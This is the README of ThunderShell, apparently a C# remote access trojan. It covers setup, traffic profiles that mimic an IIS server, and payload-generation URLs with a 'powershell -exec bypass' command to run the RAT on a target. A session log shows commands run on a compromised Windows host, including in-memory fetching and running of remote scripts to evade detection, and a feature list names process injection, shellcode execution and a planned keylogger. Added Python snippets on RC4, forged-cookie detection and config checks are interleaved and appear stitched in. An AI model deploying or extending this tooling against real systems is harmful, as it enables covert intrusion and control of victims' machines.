ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is employed here to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.
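To make the integrity point concrete, here is an added example (not ThunderShell's own code) built on a textbook RC4 implementation. It shows that a single flipped bit in RC4 ciphertext decrypts to a single flipped bit in the plaintext with no error raised, which is exactly what the HTTPS layer is there to catch. The key and message in demo() are constructed values.

```python
"""Added example, not ThunderShell code: a textbook RC4 implementation used to show
why the second RC4 layer obfuscates traffic but gives no integrity, so HTTPS is still
needed. The key and message in demo() are constructed values."""


def rc4_keystream(key: bytes):
    """Yield RC4 keystream bytes for `key` (key scheduling, then the PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher: encrypt and decrypt are the same XOR with the keystream."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def flip_bit(data: bytes, byte_index: int, bit: int) -> bytes:
    """Return a copy of `data` with one bit flipped (what a corrupting on-path box would do)."""
    out = bytearray(data)
    out[byte_index] ^= 1 << bit
    return bytes(out)


def demo():
    """Encrypt a command, corrupt one ciphertext bit, and decrypt both.

    Returns (original_plaintext, plaintext_after_corruption). The second value is
    still accepted as valid output: nothing in RC4 detects that the ciphertext was
    changed, so integrity has to come from an outer layer such as TLS."""
    key = b"constructed-demo-key"   # constructed; the real key is generated on first run
    message = b"whoami"
    ciphertext = rc4(key, message)
    corrupted = flip_bit(ciphertext, 0, 0)
    return rc4(key, ciphertext), rc4(key, corrupted)


if __name__ == "__main__":
    original, altered = demo()
    print(original, altered)
```

The rc4() function is checked in the test against the well-known "Key"/"Plaintext" test vector; the demo shows "whoami" turning into "vhoami" after one corrupted bit, with the receiver none the wiser.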
The "core" RAT doesn't require a second stage to be injected / loaded in memory.
Current release is 2.0.2
Cloning the repository
git clone https://github.com/Mr-Un1k0d3r/ThunderShell
ThunderShell itself uses Python2 and requires the following dependencies:
apt install python
apt install redis-server
apt install mysql-server
apt install mono-dmcs
apt install python-redis
apt install python-mysqldb
apt install python-tabulate
Currently ThunderShell supports:
C# as cs
powershell as ps
C# exe as exe
The default option is powershell (ps).
ThunderShell can be used through the CLI and the web interface (under development) and supports several users at the same time on both the web interface and the CLI.
The tool provides typical web traffic and error logs. Commands for every active session are saved on disk for future reference. The log folder structure contains each shell output sorted by date.
The ThunderShell client supports threading, meaning you can execute several commands in parallel on your target. ThunderShell handles this for you on both the client and the server.
(under development) ThunderShell allows you to configure the network request performed by the client by setting arbitrary headers and changing the format of the data sent to the server.
Example configuration file profile.json:
{
"headers": {
"X-Powered-By": "ASP.NET",
"X-AspNet-Version": "4.0.30319",
"Set-Cookie": "ASP.NET_SessionId={{random}}[32];"
},
"autocommands": ["whoami", "cmd /c set"],
"auto-interact": "on"
}
The {{random}}[size] syntax can be used to set arbitrary values at runtime. The profile is loaded by the main configuration file shown below.
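A defender-side check, added here and not part of ThunderShell: given a captured HTTP response header block, it flags ASP.NET_SessionId cookies that do not look like genuine ASP.NET output. It assumes the default profile.json above is in use (a 32-character random session id with no cookie attributes). That genuine ASP.NET session ids are 24 characters drawn from a-z and 0-5 and carry a path attribute is a fact about ASP.NET, not something this README states. Both header blocks in the code are constructed samples.

```python
"""Added example, not ThunderShell code: flag Set-Cookie headers whose
ASP.NET_SessionId does not match what real ASP.NET emits. Assumes the README's
default profile ("ASP.NET_SessionId={{random}}[32];"). Sample blocks are constructed."""
import re
from typing import Dict, List

SESSION_RE = re.compile(r"ASP\.NET_SessionId=([^;\s]*)")
# Genuine ASP.NET: 15 random bytes encoded as 24 chars over the alphabet a-z0-5.
GENUINE_ID_RE = re.compile(r"^[a-z0-5]{24}$")

# Constructed: what the default profile.json would produce (32 random chars, no attributes).
PROFILE_RESPONSE = """HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=Qh7xPz3mNcV9bL2kR8tWyE4uA6sD0fG1;
Content-Type: text/html
"""

# Constructed: the shape a real IIS/ASP.NET server sends.
GENUINE_RESPONSE = """HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qc2k1m55xkf0vpztt5ci3xvp; path=/; HttpOnly
Content-Type: text/html
"""


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse a raw response header block into a lower-cased name -> [values] map."""
    headers: Dict[str, List[str]] = {}
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def suspicious_session_cookie(raw: str) -> List[str]:
    """Return reasons the ASP.NET_SessionId cookie looks forged; empty means it looks genuine."""
    reasons = []
    for cookie in parse_headers(raw).get("set-cookie", []):
        match = SESSION_RE.search(cookie)
        if not match:
            continue
        sid = match.group(1)
        if len(sid) != 24:
            reasons.append("session id length %d (genuine ASP.NET uses 24)" % len(sid))
        elif not GENUINE_ID_RE.match(sid):
            reasons.append("session id uses characters outside a-z0-5")
        if "path=" not in cookie.lower():
            reasons.append("cookie lacks the path attribute ASP.NET sets")
    return reasons


if __name__ == "__main__":
    print("profile:", suspicious_session_cookie(PROFILE_RESPONSE))
    print("genuine:", suspicious_session_cookie(GENUINE_RESPONSE))
```

Because the profile is operator-configurable, this only catches the stock profile; treat it as one signal to correlate with the fixed callback interval rather than as a standalone rule.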
The client uses a C# unmanaged approach to execute powershell code. This allows the user to execute arbitrary powershell commands directly from the shell without invoking powershell.exe.
First, the configuration file needs to be configured properly. Here is an example of a configuration file default.json:
{
"redis-host": "localhost",
"redis-port": 6379,
"mysql-host": "localhost",
"mysql-user": "root",
"mysql-pass": "",
"mysql-port": "3306",
"http-host": "1.1.1.1",
"http-port": 1111,
"http-server": "Microsoft-IIS/7.5",
"http-download-path": "cat.png",
"http-default-404": "default.html",
"https-enabled": "off",
"https-cert-path": "cert.pem",
"encryption-key": "",
"max-output-timeout": 5,
"server-password": "",
"aliases": {
"myalias": ""
},
"cli-sync-delay": 5,
"http-profile": "profile.json"
}
The server-password and encryption-key are generated automatically on the first run.
The server, including the web interface, is started from the CLI:
$ python ThunderShell.py default.json MrUn1k0d3r -gui
default.json is the configuration file. MrUn1k0d3r is the username for the session. -gui launches the web interface.
Other users can start a CLI interface by adding the -notthpd switch to avoid trying to start the HTTP daemon a second time.
If https-enabled is on, https-cert-path must point to a PEM file with this structure:
-----BEGIN RSA PRIVATE KEY-----
... (private key in base64 encoding) ...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
... (certificate in base64 PEM encoding) ...
-----END CERTIFICATE-----
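A pre-flight check for the configuration above, added here and not part of ThunderShell: it loads a default.json, reports when https-enabled is off (leaving only the RC4 layer), and when it is on verifies that the https-cert-path file has the layout just shown, an RSA private key block immediately followed by a certificate block. The JSON and PEM text in the code are constructed samples; the base64 bodies are placeholders, not key material.

```python
"""Added example, not ThunderShell code: pre-flight check of default.json and of the
PEM file named by https-cert-path (RSA private key block followed by certificate block,
as the README describes). Sample config and PEM below are constructed placeholders."""
import json
import re
from typing import Dict, List, Optional

# Exactly the structure the README asks for: private key first, certificate second.
PEM_LAYOUT_RE = re.compile(
    r"^-----BEGIN RSA PRIVATE KEY-----\n[A-Za-z0-9+/=\n]+-----END RSA PRIVATE KEY-----\n"
    r"-----BEGIN CERTIFICATE-----\n[A-Za-z0-9+/=\n]+-----END CERTIFICATE-----\n?$"
)

# Constructed sample config (subset of the README's default.json keys, HTTPS turned on).
SAMPLE_CONFIG: Dict = json.loads("""{
    "mysql-user": "root",
    "mysql-pass": "constructed-db-password",
    "https-enabled": "on",
    "https-cert-path": "cert.pem",
    "encryption-key": "",
    "server-password": ""
}""")

# Constructed PEM with placeholder base64 bodies ("PLACEHOLDER" encoded), not real keys.
GOOD_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\nUExBQ0VIT0xERVI=\n-----END RSA PRIVATE KEY-----\n"
    "-----BEGIN CERTIFICATE-----\nUExBQ0VIT0xERVI=\n-----END CERTIFICATE-----\n"
)
# Same blocks in the wrong order: a common mistake when concatenating files.
REVERSED_PEM = (
    "-----BEGIN CERTIFICATE-----\nUExBQ0VIT0xERVI=\n-----END CERTIFICATE-----\n"
    "-----BEGIN RSA PRIVATE KEY-----\nUExBQ0VIT0xERVI=\n-----END RSA PRIVATE KEY-----\n"
)


def check_config(config: Dict, pem_text: Optional[str]) -> List[str]:
    """Return findings for a parsed default.json; an empty list means it passes.

    `pem_text` is the content of the https-cert-path file, or None if it could not
    be read. Empty encryption-key / server-password values are not flagged because
    the README says both are generated automatically on the first run."""
    findings = []
    if config.get("https-enabled") == "on":
        if pem_text is None:
            findings.append("https-enabled is on but %s could not be read" % config.get("https-cert-path"))
        elif not PEM_LAYOUT_RE.match(pem_text):
            findings.append("https-cert-path must contain the RSA private key block followed by the certificate block")
    else:
        findings.append("https-enabled is off: transport relies on the RC4 layer alone, which has no integrity")
    if config.get("mysql-pass", "") == "":
        findings.append("mysql-pass is empty for user %s" % config.get("mysql-user", "?"))
    return findings


def check_config_file(config_path: str) -> List[str]:
    """Disk-backed variant: read default.json and the PEM file it points to."""
    with open(config_path) as fh:
        config = json.load(fh)
    pem_text: Optional[str] = None
    if config.get("https-enabled") == "on":
        try:
            with open(config["https-cert-path"]) as fh:
                pem_text = fh.read()
        except OSError:
            pem_text = None
    return check_config(config, pem_text)


if __name__ == "__main__":
    for finding in check_config(dict(SAMPLE_CONFIG, **{"https-enabled": "off"}), GOOD_PEM):
        print("[-]", finding)
```

Run check_config_file("default.json") before starting the server; an empty result means the HTTPS settings and the PEM layout match what the README requires.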
ThunderShell generates payloads through the web interface. The endpoint is defined by the http-download-path variable.
Based on the configuration file, to generate a payload simply browse to:
http://1.1.1.1:1111/cat.png
The endpoint supports several options that can be added to the URL: http://1.1.1.1:1111/cat.png/type/delay/
type supports only ps and exe for now. delay is the amount of sleep (in milliseconds) between each callback. Its default value is 10000 (10 seconds).
There are several ways of executing the RAT on the target. One simple example is to use powershell:
http://1.1.1.1:1111/cat.png/ps/
Once the file is saved, execute it using the following command:
powershell -exec bypass import-module .\file.ps1
The executable can be used directly:
http://1.1.1.1:1111/cat.png/exe/
The raw C# data can be downloaded and modified manually:
http://1.1.1.1:1111/cat.png/cs/
The example below executes Windows and PowerShell commands directly without invoking powershell.exe. The fetch command is used to obfuscate the PowerShell script: the server downloads the data from the specified link, encrypts it using the RC4 key and sends it to the client. The client then decrypts and executes the code, avoiding network detection.
python ThunderShell.py default.json MrUn1k0d3r -gui
.#" =[ Thunder Shell 2.0.1 | RingZer0 Team ]=
.##"
.###" __ __ _________ __ __
###P ###| ###| ##########| ###| ###|
d########" ###| ###| ###| ###| ###|
****####" ###|_____###| ###|__ ###| ###|
.###" ############| ######| ###| ###|
.##" ###| ###| ###| ###| ###|
.#" ###| ###| ###|______ ###|_______ ###|_______
." ###| ###| ##########| ###########| ###########|
[-] install.lock not found
[*] Generating new keys
[+] Current Active session UUID is c8ab130e-9ec1-40d5-a5de-cb7c0ec9698a
[+] Starting web server on 192.168.17.129 port 8080
(Main)>>> help
Help Menu
=========
Commands Args Descriptions
---------- ------------------------------------ --------------------------------------------------------------------------------------------
list full List all active shells
interact id Interact with a session
show (password,key,error,http,event) rows Show server password, encryption key, errors, http or events log (default number of rows 10)
kill id kill shell (clear db only)
os command Execute command on the system (local)
purge force WARNING! Delete all the Redis DB
exit Exit the application
help
(Main)>>>
[+] Registering new shell DESKTOP-2JKIANV DESKTOP-2JKIANV\admin
[+] New shell ID 12 GUID is nDCCYACFWYrU6LwM
(Main)>>> interact 12
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> help
Help Menu
=========
Commands Args Descriptions
---------- -------------- ------------------------------------------------------------
background Return to the main console
fetch In memory execution of a script and execute a command
exec path/url, cmd In memory execution of code (shellcode)
read path/url Read a file on the remote host
upload remote path Upload a file on the remote system
ps path/url, path List processes
inject pid, command Inject command into a target process (max length 4096)
alias key, value Create an alias to avoid typing the same thing over and over
delay milliseconds Update the callback delay
help show this help menu
List of built in aliases
------------------------
wmiexec Remote-WmiExecute utility
searchevent Search-EventForUser utility
List user defined aliases
--------------------------
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> whoami
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: whoami
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
desktop-2jkianv\admin
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> cmd.exe /c ver
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: cmd.exe /c ver
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
Microsoft Windows [Version 10.0.16299.431]
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> $psversiontable
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: $psversiontable
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
Name Value
---- -----
PSVersion 5.1.16299.431
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.16299.431
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>> fetch https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-IEBookmarks.ps1 Get-IEBookmarks
[+] Fetching https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-IEBookmarks.ps1
[+] Executing Get-IEBookmarks
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[+] [(CLI)MrUn1k0d3r] Sending command: function Get-IEBookmarks {
# Mr.Un1k0d3r - RingZer0 Team 2016
# Get IE bookmarks URL
BEGIN {
$path = [Environment]::GetFolderPath('Favorites')
Write-Output "[+] Bookmark are located in $($path)"
}
PROCESS {
Get-ChildItem -Recurse $path -Include "*.url" | ForEach {
$data = Get-Content $_.fullname | Select-String -Pattern URL
Write-Output $data
}
}
END {
Write-Output "[+] Process completed..."
}
}
;Get-IEBookmarks
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
[*] Command output:
[+] Bookmark are located in C:\Users\admin\Favorites
URL=http://go.microsoft.com/fwlink/p/?LinkId=255142
[+] Process completed...
(DESKTOP-2JKIANV DESKTOP-2JKIANV\admin)>>>
You can customize the "error" page that is returned for each GET request by specifying your HTML template through the http-default-404 variable. The file needs to be placed in the html folder and its dependencies (such as images) in the download folder. By default ThunderShell mimics an IIS server and returns the default IIS server page.
Everything placed in the download folder can be downloaded from the web server. For example, /root/ThunderShell/download/evil.exe is available at: http://1.1.1.1:1111/evil.exe
Initial release
code rewrite from powershell to C# to add flexibility
multi threads and multiple shell now sync
payload generator support exe
custom response headers added
bug fix
auto install dependencies on first run
- Implement in-memory protection using C# and push / pull code there to avoid sending the data several times
- Implement different delivery methods
- Inject the PowerShell RAT into another process
- Fully integrated keylogger
Mr.Un1k0d3r @MrUn1k0d3r
Tazz0 @Tazz019
RingZer0 Team 2017